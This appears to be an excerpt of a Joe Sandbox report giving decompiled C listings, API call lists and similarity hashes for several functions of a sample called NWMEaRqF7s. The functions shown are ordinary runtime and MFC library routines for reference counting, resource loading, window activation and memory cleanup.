				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x43f810);
				E00421418(__ebx, __edi, __esi);
				_t31 = E0042485D(__edx, __edi, _t35);
				_t15 =  *0x443df4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00422E2D(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x443cf8; // 0x2351320
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x4438d0;
								if(__eflags != 0) {
									_push(_t33);
									E0041E18A(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x443cf8; // 0x2351320
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x443cf8; // 0x2351320
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00425307();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0041F916(_t25, _t29, _t31, 0x20);
				}
				return E0042145D(_t33);
			}

0x0042526c
0x0042526c
0x0042526c
0x0042526c
0x0042526e
0x00425273
0x0042527d
0x0042527f
0x00425287
0x004252a8
0x004252ae
0x004252b2
0x004252b5
0x004252b8
0x004252be
0x004252c0
0x004252c2
0x004252c5
0x004252cb
0x004252cd
0x004252cf
0x004252d5
0x004252d7
0x004252d8
0x004252dd
0x004252d5
0x004252cd
0x004252de
0x004252e3
0x004252e6
0x004252ec
0x004252f0
0x004252f0
0x004252f6
0x004252fd
0x0042528f
0x0042528f
0x0042528f
0x00425294
0x00425298
0x0042529d
0x004252a5

APIs

Part of subcall function 0042485D: __getptd_noexit.LIBCMT ref: 0042485E
Part of subcall function 0042485D: __amsg_exit.LIBCMT ref: 0042486B

__amsg_exit.LIBCMT ref: 00425298
__lock.LIBCMT ref: 004252A8
InterlockedDecrement.KERNEL32(?), ref: 004252C5
InterlockedIncrement.KERNEL32(02351320), ref: 004252F0

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: b1b043d092f6a2a1616c32b40d31738fdcf655e9fae88bb2fc2316b540347ebb
Instruction ID: 724aaa48ea21f26d78a4a53a77eade52139c7390ef92faafb76bd8af03b18e74
Opcode Fuzzy Hash: b1b043d092f6a2a1616c32b40d31738fdcf655e9fae88bb2fc2316b540347ebb
Instruction Fuzzy Hash: 50017032B01A32E7CB11AB55B80674A7360AB05715F51016BF814A73D0CB38A9818FED

Uniqueness

Uniqueness Score: -1.00%

Function 0040C865, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C865(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E0040C41C(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E0040DB94(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

0x0040c869
0x0040c86b
0x0040c86d
0x0040c871
0x0040c873
0x0040c8a8
0x0040c8b2
0x0040c8b4
0x0040c8bb
0x0040c8bb
0x00000000
0x0040c8c1
0x0040c87a
0x0040c887
0x0040c88f
0x00000000
0x00000000
0x0040c893
0x0040c899
0x0040c89d
0x0040c8a6
0x00000000
0x0040c8a6
0x0040c8c7

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 0040C887
LoadResource.KERNEL32(?,00000000,?,?,?,?,0040605B,?,?,00401E60,A920217C), ref: 0040C893
LockResource.KERNEL32(00000000,?,?,?,?,0040605B,?,?,00401E60,A920217C), ref: 0040C8A0
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,0040605B,?,?,00401E60,A920217C), ref: 0040C8BB

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 4b2985310e55d01a51c35c94c145e98cb6cf6508d3b3b950bf57967042e4943f
Instruction ID: 1cc108b070ddcadaf49700f58f1fb47de74f4529278b4a49e0f23a097ff97351
Opcode Fuzzy Hash: 4b2985310e55d01a51c35c94c145e98cb6cf6508d3b3b950bf57967042e4943f
Instruction Fuzzy Hash: 00F062372012119BD7112BB65CC897BB6A8AFC5692705427AF905F2392DB389C05817D

Uniqueness

Uniqueness Score: -1.00%

Function 004064EE, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064EE() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E0040CA8B(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E00405F01(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E0041F7C2(_t16);
			}

0x004064ee
0x004064f1
0x004064f9
0x004064ff
0x004064ff
0x00406507
0x0040650e
0x0040650e
0x00406517
0x00406519
0x0040651f
0x00406522
0x00406527
0x00406527
0x00406522
0x00406531
0x00406536
0x0040653e
0x00406543
0x00406543
0x00406549
0x00406551

APIs

EnableWindow.USER32(?,00000001), ref: 0040650E
GetActiveWindow.USER32 ref: 00406519
SetActiveWindow.USER32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406527
FreeResource.KERNEL32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406543

Part of subcall function 0040CA8B: EnableWindow.USER32(?,?), ref: 0040CA98

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 2876d6dea77e8e8b7ec39ccd4b15d906bf4c1806271e33c20b36b9320a52a774
Instruction ID: 4853af9af119085c85b499c513028b08372eaae9968efb4a3fc4ab9602832ae4
Opcode Fuzzy Hash: 2876d6dea77e8e8b7ec39ccd4b15d906bf4c1806271e33c20b36b9320a52a774
Instruction Fuzzy Hash: 55F04F30A00605DBCF21AF64DC455AEBBB1BF88705B55113AE503722E5C73A6D90CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041CE14, Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041CE14(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;

				_t14 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x446820;
					if( *0x446820 == 0) {
						_t5 = GetTickCount();
						 *0x446820 =  *0x446820 + 1;
						__eflags =  *0x446820;
						 *0x4433d8 = _t5;
					}
					_t4 = GetTickCount() -  *0x4433d8;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x4433d8 = _t4;
					}
					return _t4;
				}
				return E0041CDBD(_t7, _t8, _t9, _t13, _t14, _a8);
			}

0x0041ce14
0x0041ce19
0x0041ce26
0x0041ce34
0x0041ce36
0x0041ce38
0x0041ce38
0x0041ce3e
0x0041ce3e
0x0041ce45
0x0041ce4b
0x0041ce50
0x0041ce52
0x0041ce58
0x0041ce5a
0x0041ce5a
0x00000000
0x0041ce5f
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0041CE36
GetTickCount.KERNEL32 ref: 0041CE43
CoFreeUnusedLibraries.OLE32 ref: 0041CE52
GetTickCount.KERNEL32 ref: 0041CE58

Part of subcall function 0041CDBD: CoFreeUnusedLibraries.OLE32(00000000,0041CE9C,00000000), ref: 0041CE01
Part of subcall function 0041CDBD: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0041CE9C), ref: 0041CE07

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 5235b46726404d5874cca75f6cc8b7585f8e2c9bb584c9876188f54316066500
Instruction ID: 38eb2e71dc98f28b912332c2f41d7ff22c59e4d9a07145cfe7d16bad1c32e9e8
Opcode Fuzzy Hash: 5235b46726404d5874cca75f6cc8b7585f8e2c9bb584c9876188f54316066500
Instruction Fuzzy Hash: 54E0E538944324ABD750BF24EC8879A7BA0AB4AB41F114837D44096274CB7879C1CE9E

Uniqueness

Uniqueness Score: -1.00%

Function 004169C9, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004169C9(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E00402EE1( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E00402EE1( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E00416138(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E0041F330(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E00406B97( &_v20);
										E00413D5B(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E00402F0C(0, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E00402F0C(0, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E00416138(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}

0x004169d1
0x004169d3
0x004169d8
0x004169eb
0x004169ef
0x00416a2c
0x00416a2c
0x00416a2e
0x00416a31
0x00416a34
0x00416a4d
0x00416a4d
0x00416a50
0x00416a52
0x00416a58
0x00416a59
0x00416a60
0x00416a69
0x00416a69
0x00416a6c
0x00416a6f
0x00416a72
0x00416a75
0x00416b1f
0x00416b1f
0x00416b22
0x00416b33
0x00416b36
0x00416b39
0x00416b3b
0x00416b41
0x00416b49
0x00416b52
0x00416b52
0x00416b55
0x00416b58
0x00416b7f
0x00416b81
0x00000000
0x00416b5a
0x00416b5a
0x00416b5a
0x00416b5c
0x00416b66
0x00416b6e
0x00416b73
0x00416b76
0x00416b77
0x00416b7a
0x00416b7a
0x00000000
0x00416b5c
0x00416a7b
0x00416a7b
0x00416a7e
0x00416a88
0x00416a8b
0x00416a8d
0x00416a90
0x00000000
0x00000000
0x00416a95
0x00416a95
0x00416a98
0x00416aa6
0x00416abc
0x00416aca
0x00416ad1
0x00416ad9
0x00416ae1
0x00416ae9
0x00416aec
0x00416afd
0x00416b01
0x00416b04
0x00416b04
0x00416b0a
0x00416b0a
0x00416b0c
0x00416b0c
0x00416b12
0x00416b16
0x00416b16
0x00000000
0x00416a7e
0x00416a75
0x00416a39
0x00416a39
0x00416a3c
0x00416a3c
0x00416a3e
0x00416a41
0x00416a44
0x00416a45
0x00416a48
0x00416a48
0x00000000
0x00416a3c
0x004169f1
0x004169f3
0x004169f6
0x00416a29
0x00416a29
0x00000000
0x00416a29
0x004169f8
0x004169fb
0x00416a02
0x00416a08
0x00416a0c
0x00416a0d
0x00416a0d
0x00416a12
0x00416a15
0x00416a17
0x00416a1a
0x00416a1f
0x00416a22
0x00416a28
0x00000000
0x00416a15
0x004169da
0x00000000

APIs

VariantClear.OLEAUT32(?), ref: 00416A02

Strings

(, xrefs: 00416B12

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ClearVariant
String ID: (
API String ID: 1473721057-3887548279
Opcode ID: 9e245cdb4b1b3db07f8c097b9736297f1d35a6d1de3b859328f47831a016493d
Instruction ID: e2f1c9d16809879ff49900d9c467e20496c9c06d17cdb03baeed69f06c4bbff3
Opcode Fuzzy Hash: 9e245cdb4b1b3db07f8c097b9736297f1d35a6d1de3b859328f47831a016493d
Instruction Fuzzy Hash: EC517871A007019FCB64CF69CA819AAB7F1FF48314B514A2EE58397A91C774F881CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004146F5, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E004146F5(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t79;
				void* _t90;
				intOrPtr _t97;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				signed int _t120;
				signed int _t128;
				signed int _t131;
				intOrPtr _t132;
				void* _t155;

				_t153 = __edi;
				_push(0x70);
				E0041F6EA(E00432D8F, __ebx, __edi, __esi);
				_t155 = __ecx;
				_t79 =  *(__ecx + 0x50);
				_t128 = 0;
				_t131 = 0 | _t79 != 0x00000000;
				if(_t131 != 0) {
					_push( &_v16);
					_push(0x439440);
					_v16 = 0;
					_t131 =  *_t79;
					_push(_t79);
					_v20 = 0;
					if( *_t131() < 0) {
						L19:
						return E0041F7C2(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L4;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E0041A7E4( &_v36);
							_t97 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t97 == 0) {
								goto L4;
							} else {
								_t153 =  *((intOrPtr*)(_t97 + 0x20));
								_v104 = 0;
								if(_t153 == 0) {
									goto L4;
								} else {
									do {
										_t31 = _t128 + 0x4369f8; // 0xfffffd3b
										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
										if(_v28 != 0) {
											_t34 = _t128 + 0x4369fc; // 0x4
											_v104 = _v104 |  *_t34;
										}
										_t128 = _t128 + 8;
									} while (_t128 < 0x40);
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
									_t114 = _v28;
									_push( &_v92);
									_push(0x439490);
									_push(_t114);
									if( *((intOrPtr*)( *_t114))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t116 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t116);
									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t118 = _v16;
									 *((intOrPtr*)( *_t118 + 8))(_t118);
									_t120 = _v92;
									if(_t120 != 0) {
										 *((intOrPtr*)( *_t120 + 8))(_t120);
									}
									__imp__#9( &_v36);
									goto L19;
								}
							}
						}
					}
				} else {
					L4:
					_push(_t131);
					_t4 =  &_v24; // 0x4423e8
					_v24 = 0x442480;
					E0041F7F4(_t4, 0x43c590);
					asm("int3");
					_push(4);
					E0041F6EA(E00431BFC, _t128, _t153, _t155);
					_t132 = E0040F014(0x104);
					_v36 = _t132;
					_t90 = 0;
					_v24 = 0;
					if(_t132 != 0) {
						_t90 = E0040D519(_t132);
					}
					return E0041F7C2(_t90);
				}
			}

0x004146f5
0x004146f5
0x004146fc
0x00414701
0x00414703
0x00414708
0x0041470c
0x00414711
0x0041471b
0x0041471c
0x00414721
0x00414724
0x00414726
0x00414727
0x0041472e
0x004148a3
0x004148ab
0x00414734
0x0041473e
0x00000000
0x00414740
0x00414746
0x0041474f
0x00414758
0x0041475f
0x00414766
0x00414769
0x0041476c
0x0041476f
0x00414772
0x00414777
0x0041477c
0x0041477f
0x00000000
0x00414781
0x00414781
0x00414786
0x00414789
0x00000000
0x0041478b
0x0041478b
0x00414791
0x0041479a
0x004147a5
0x004147a7
0x004147ad
0x004147ad
0x004147b0
0x004147b3
0x004147c6
0x004147d8
0x004147e0
0x004147f2
0x004147fa
0x0041480d
0x00414815
0x00414827
0x0041482f
0x00414835
0x0041483d
0x0041483e
0x00414843
0x00414848
0x0041484a
0x0041484a
0x0041484e
0x00414854
0x00414858
0x00414859
0x00414862
0x00414868
0x0041486d
0x00414873
0x00414879
0x0041487c
0x0041487c
0x00414883
0x00414889
0x0041488c
0x00414891
0x00414896
0x00414896
0x0041489d
0x00000000
0x0041489d
0x00414789
0x0041477f
0x0041473e
0x00414713
0x00414713
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x0040382b

APIs

__EH_prolog3.LIBCMT ref: 004146FC

Strings

@, xrefs: 0041475F

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: H_prolog3
String ID: @
API String ID: 431132790-2766056989
Opcode ID: efa78f53c0518dc018037837d0fade7883eb2ca6750ca131b4e709d9f413c559
Instruction ID: 551150b91cef73a53ffa5b2b1fed6b209468a552cb216a3673e312414697938b
Opcode Fuzzy Hash: efa78f53c0518dc018037837d0fade7883eb2ca6750ca131b4e709d9f413c559
Instruction Fuzzy Hash: 7651E8B0E0020A9FDB14CFA5C884AEEB7F9BF48304F14456EE516EB290E779A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00402B10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00402B10(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				intOrPtr* _t66;
				void* _t73;

				_t73 = __ebx;
				_v56 = __ecx;
				if(_a8 != 0) {
					if(_a4 == 0) {
						E00401040(0x80070057);
					}
					_v32 =  *((intOrPtr*)( *_v56 - 0xc));
					_v8 = _v32;
					_v36 =  *_v56;
					_v12 = _a4 - _v36;
					_v48 =  *_v56 - 0x10;
					_v40 = 1 -  *((intOrPtr*)(_v48 + 0xc));
					_v44 =  *((intOrPtr*)(_v48 + 8)) - _a8;
					if((_v40 | _v44) < 0) {
						E00402CE0(_v56, _a8);
					}
					_v52 =  *_v56;
					_v16 = _v52;
					if(_v12 > _v8) {
						E0041F3AA(_t73, _a8, _v16, _a8, _a4, _a8);
					} else {
						E0041F425(_v16, _a8, _v16 + _v12, _a8);
					}
					if(_a8 < 0 || _a8 >  *((intOrPtr*)( *_v56 - 8))) {
						E00401040(0x80070057);
					}
					 *((intOrPtr*)( *_v56 - 0xc)) = _a8;
					_t66 = _v56;
					 *((char*)( *_t66 + _a8)) = 0;
					return _t66;
				}
				return E00402C20(_v56);
			}

0x00402b10
0x00402b16
0x00402b1d
0x00402b30
0x00402b37
0x00402b37
0x00402b44
0x00402b4a
0x00402b52
0x00402b5b
0x00402b66
0x00402b74
0x00402b80
0x00402b89
0x00402b92
0x00402b92
0x00402b9c
0x00402ba2
0x00402bab
0x00402bda
0x00402bad
0x00402bc0
0x00402bc5
0x00402be6
0x00402bfa
0x00402bfa
0x00402c07
0x00402c0a
0x00402c12
0x00000000
0x00402c12
0x00000000

APIs

_memmove_s.LIBCMT ref: 00402BC0

Strings

~hW, xrefs: 00402BF3

Memory Dump Source

